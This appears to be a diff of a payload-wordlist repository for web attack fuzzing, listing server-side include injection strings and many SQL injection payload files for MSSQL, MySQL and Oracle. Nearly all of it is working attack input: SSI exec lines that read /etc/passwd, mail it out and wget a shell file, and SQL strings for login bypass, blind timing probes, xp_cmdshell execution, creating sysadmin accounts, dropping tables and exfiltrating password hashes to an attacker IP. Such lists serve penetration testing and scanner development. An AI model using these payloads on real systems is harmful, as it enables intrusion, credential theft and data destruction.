<!--#echo var="content_type" -->
<!--#echo var="date_gmt" -->
<!--#echo var="date_local" -->
<!--#echo var="DATE_LOCAL" -->
<!--#echo var="document_name" -->
<!--#echo var="DOCUMENT_NAME" -->
<!--#echo var="document_root" -->
<!--#echo var="document_uri" -->
<!--#echo var="DOCUMENT_URI" -->
<!--#echo var="forwarded" -->
<!--#echo var="from" -->
<!--#echo var="gateway_interface" -->
<!--#echo var="http_accept" -->
<!--#echo var="http_accept_charset" -->
<!--#echo var="http_accept_encoding" -->
<!--#echo var="http_accept_language" -->
<!--#echo var="http_client_ip" -->
<!--#echo var="http_connection" -->
<!--#echo var="http_cookie" -->
<!--#echo var="http_form" -->
<!--#echo var="http_host" -->
<!--#echo var="http_referer" -->
<!--#echo var="http_ua_cpu" -->
<!--#echo var="http_ua_os" -->
<!--#echo var="http_user_agent" -->
<!--#echo var="last_modified" -->
<!--#echo var="netsite_root" -->
<!--#echo var="page_count" -->
<!--#echo var="path" -->
<!--#echo var="path_info" -->
<!--#echo var="path_info_translated" -->
<!--#echo var="path_translated" -->
<!--#echo var="query_string" -->
<!--#echo var="query_string_unescaped" -->
<!--#echo var="remote_addr" -->
<!--#echo var="remote_host" -->
<!--#echo var="remote_ident" -->
<!--#echo var="remote_port" -->
<!--#echo var="remote_user" -->
<!--#echo var="request_method" -->
<!--#echo var="request_uri" -->
<!--#echo var="script_filename" -->
<!--#echo var="script_name" -->
<!--#echo var="script_uri" -->
<!--#echo var="script_url" -->
<!--#echo var="server_addr" -->
<!--#echo var="server_admin" -->
<!--#echo var="server_name -->
<!--#echo var="server_port" -->
<!--#echo var="server_protocol" -->
<!--#echo var="server_software" -->
<!--#echo var="site_htmlroot" -->
<!--#echo var="total_hits" -->
<!--#echo var="tz" -->
<!--#echo var="unique_id" -->
<!--#echo var="user_name" -->
<!--#exec cmd="/bin/ls /" -->
<!--#exec cmd="/bin/ls /" --><br/>
<!--#exec cmd="cat /etc/passwd" --><br/>
<!--#exec cmd="cd C:\WINDOWS\System32">
<!--#exec cmd="dir" -->
<!--#exec cmd="find / -name *.* -print" --><br/>
<!--#exec cmd="ls" -->
<!--#exec cmd="mail email@dom.tld <mailto:email@dom.tld> < cat /etc/passwd" --><br/>
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
<!--#exec cmd="whoami"-->
<!--#flastmod virtual="echo.html" -->
<!--#fsize file="ssi.shtml" -->
<!--#include file=?UUUUUUUU...UU?-->
<!--#printenv -->
<pre><!--#echo var="DATE_LOCAL" --> </pre>
<pre><!--#exec cmd="dir" --></pre>
<pre><!--#exec cmd="ls" --></pre>
<pre><!--#exec cmd="whoami"--></pre>

41
attack/sql-injection/detect/GenericBlind.txt Normal file
View file

@ -0,0 +1,41 @@
sleep(__TIME__)#
1 or sleep(__TIME__)#
" or sleep(__TIME__)#
' or sleep(__TIME__)#
" or sleep(__TIME__)="
' or sleep(__TIME__)='
1) or sleep(__TIME__)#
") or sleep(__TIME__)="
') or sleep(__TIME__)='
1)) or sleep(__TIME__)#
")) or sleep(__TIME__)="
')) or sleep(__TIME__)='
;waitfor delay '0:0:__TIME__'--
);waitfor delay '0:0:__TIME__'--
';waitfor delay '0:0:__TIME__'--
";waitfor delay '0:0:__TIME__'--
');waitfor delay '0:0:__TIME__'--
");waitfor delay '0:0:__TIME__'--
));waitfor delay '0:0:__TIME__'--
'));waitfor delay '0:0:__TIME__'--
"));waitfor delay '0:0:__TIME__'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(__TIME__)--
1 or pg_sleep(__TIME__)--
" or pg_sleep(__TIME__)--
' or pg_sleep(__TIME__)--
1) or pg_sleep(__TIME__)--
") or pg_sleep(__TIME__)--
') or pg_sleep(__TIME__)--
1)) or pg_sleep(__TIME__)--
")) or pg_sleep(__TIME__)--
')) or pg_sleep(__TIME__)--

1
attack/sql-injection/detect/Generic_SQLI.txt Normal file
View file

@ -0,0 +1 @@

16
attack/sql-injection/detect/MSSQL.txt Normal file
View file

@ -0,0 +1,16 @@
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
'create user name identified by 'pass123' --
'create user name identified by pass123 temporary tablespace temp default tablespace users;
' ; drop table temp --
'exec sp_addlogin 'name' , 'password' --
' exec sp_addsrvrolemember 'name' , 'sysadmin' --
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
' grant connect to name; grant resource to name; --
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
' or 1=1 --
' union (select @@version) --
' union (select NULL, (select @@version)) --
' union (select NULL, NULL, (select @@version)) --
' union (select NULL, NULL, NULL, (select @@version)) --
' union (select NULL, NULL, NULL, NULL, (select @@version)) --
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --

8
attack/sql-injection/detect/MSSQL_blind.txt Normal file
View file

@ -0,0 +1,8 @@
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

9
attack/sql-injection/detect/MySQL.txt Normal file
View file

@ -0,0 +1,9 @@
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
1or1=1
1'or'1'='1
fake@ema'or'il.nl'='il.nl

10
attack/sql-injection/detect/MySQL_MSSQL.txt Normal file
View file

@ -0,0 +1,10 @@
1
1 and user_name() = 'dbo'
\'; desc users; --
1\'1
1' and non_existant_table = '1
' or username is not NULL or username = '
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
1 uni/**/on select all from where

55
attack/sql-injection/detect/oracle.txt Normal file
View file

@ -0,0 +1,55 @@
or 1=1
' or '1'='1
'||utl_http.request('httP://192.168.1.1/')||'
' || myappadmin.adduser('admin', 'newpass') || '
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i

193
attack/sql-injection/detect/xplatform.txt Normal file
View file

@ -0,0 +1,193 @@
<>"'%;)(&+
|
!
?
/
//
//*
'
' --
(
)
*|
*/*
&
0
031003000270000
0 or 1=1
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
1 or 1=1
1;SELECT%20*
1 waitfor delay '0:0:10'--
'%20or%20''='
'%20or%201=1
')%20or%20('x'='x
'%20or%20'x'='x
%20or%20x=x
%20'sleep%2050'
%20$(sleep%2050)
%21
23 OR 1=1
%26
%27%20or%201=1
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
||6
'||'6
(||6)
%7C
a'
admin' or '
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
' and 1 in (select var from temp)--
anything' OR 'x'='x
"a"" or 1=1--"
a' or 1=1--
"a"" or 3=3--"
a' or 3=3--
a' or 'a' = 'a
&apos;%20OR
as
asc
a' waitfor delay '0:0:10'--
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
bfilename
char%4039%41%2b%40SELECT
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @q nvarchar (4000) select @q =
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @s varchar(22) select @s =
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
delete
desc
distinct
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
'; exec master..xp_cmdshell
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
exec(@s)
'; exec ('sel' + 'ect us' + 'er')
exec sp
'; execute immediate 'sel' || 'ect us' || 'er'
exec xp
'; exec xp_regread
' group by userid having 1=1--
handler
having
' having 1=1--
hi or 1=1 --"
hi' or 1=1 --
"hi"") or (""a""=""a"
hi or a=a
hi' or 'a'='a
hi') or ('a'='a
'hi' or 'x'='x';
insert
like
limit
*(|(mail=*))
*(|(objectclass=*))
or
' or ''='
or 0=0 #"
' or 0=0 --
' or 0=0 #
" or 0=0 --
or 0=0 --
or 0=0 #
' or 1 --'
' or 1/*
; or '1'='1'
' or '1'='1
' or '1'='1'--
' or 1=1
' or 1=1 /*
' or 1=1--
' or 1=1--
'/**/or/**/1/**/=/**/1
or 1=1 --
" or 1=1--
or 1=1
or 1=1--
or 1=1 or ""=
' or 1=1 or ''='
' or 1 in (select @@version)--
or%201=1
or%201=1 --
' or 2 > 1
' or 2 between 1 and 3
' or 3=3
or 3=3 --
' or '7659'='7659
or a=a
or a = a
' or 'a'='a
' or a=a--
') or ('a'='a
" or "a"="a
) or (a=a
order by
' or (EXISTS)
or isNULL(1/0) /*
" or isNULL(1/0) /*
' or 'something' like 'some%'
' or 'something' = 'some'+'thing'
' or 'text' = n'text'
' or 'text' > 't'
' or uid like '%
' or uname like '%
' or 'unusual' = 'unusual'
' or userid like '%
' or user like '%
' or username like '%
' or username like char(37);
' or 'whatever' in ('whatever')
' -- &password=
password:*/=1--
PRINT
PRINT @@variable
procedure
replace
select
' select * from information_schema.tables--
' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
' (select top 1
--sp_password
'sqlattempt1
(sqlattempt2)
'sqlvuln
'+sqlvuln
(sqlvuln)
sqlvuln;
t'exec master..xp_cmdshell 'nslookup www.google.com'--
to_timestamp_tz
truncate
tz_offset
' UNION ALL SELECT
' union all select @@version--
' union select
uni/**/on sel/**/ect
' UNION SELECT
' union select 1,load_file('/etc/passwd'),1,1,1;
) union select * from information_schema.tables;
' union select * from users where login = char(114,111,111,116);
update
'||UTL_HTTP.REQUEST
,@variable
@variable
@var select @var as var into temp end --
\x27UNION SELECT
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND email IS NULL; --
x' AND members.email IS NULL; --
x' AND userid IS NULL; --
x' or 1=1 or 'x'='y
x' OR full_name LIKE '%Bob%
ý or 1=1 --

11
attack/sql-injection/exploit/ms-sql-enumeration.txt Normal file
View file

@ -0,0 +1,11 @@
select @@version
select @@servernamee
select @@microsoftversione
select * from master..sysserverse
select * from sysusers
exec master..xp_cmdshell 'ipconfig+/all'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
exec master..xp_cmdshell 'ping+<attackerip>'
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--

5
attack/sql-injection/exploit/mysql-injection-login-bypass.txt Normal file
View file

@ -0,0 +1,5 @@
<username>' OR 1=1--
'OR '' = ' Allows authentication without a valid username.
<username>'--
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
'OR 1=1--

1
attack/sql-injection/exploit/mysql-read-local-files.txt Normal file
View file

@ -0,0 +1 @@
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;

107
attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MSSQL-INSERT.txt Normal file
View file

@ -0,0 +1,107 @@
)%20waitfor%20delay%20'0:0:20'%20/*
)%20waitfor%20delay%20'0:0:20'%20--
')%20waitfor%20delay%20'0:0:20'%20/*
')%20waitfor%20delay%20'0:0:20'%20--
")%20waitfor%20delay%20'0:0:20'%20/*
")%20waitfor%20delay%20'0:0:20'%20--
))%20waitfor%20delay%20'0:0:20'%20/*
))%20waitfor%20delay%20'0:0:20'%20--
'))%20waitfor%20delay%20'0:0:20'%20/*
'))%20waitfor%20delay%20'0:0:20'%20--
"))%20waitfor%20delay%20'0:0:20'%20/*
"))%20waitfor%20delay%20'0:0:20'%20--
,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL)%20waifor%20delay%20'0:0:20'%20/*
',NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL)%20waifor%20delay%20'0:0:20'%20/*
'),NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
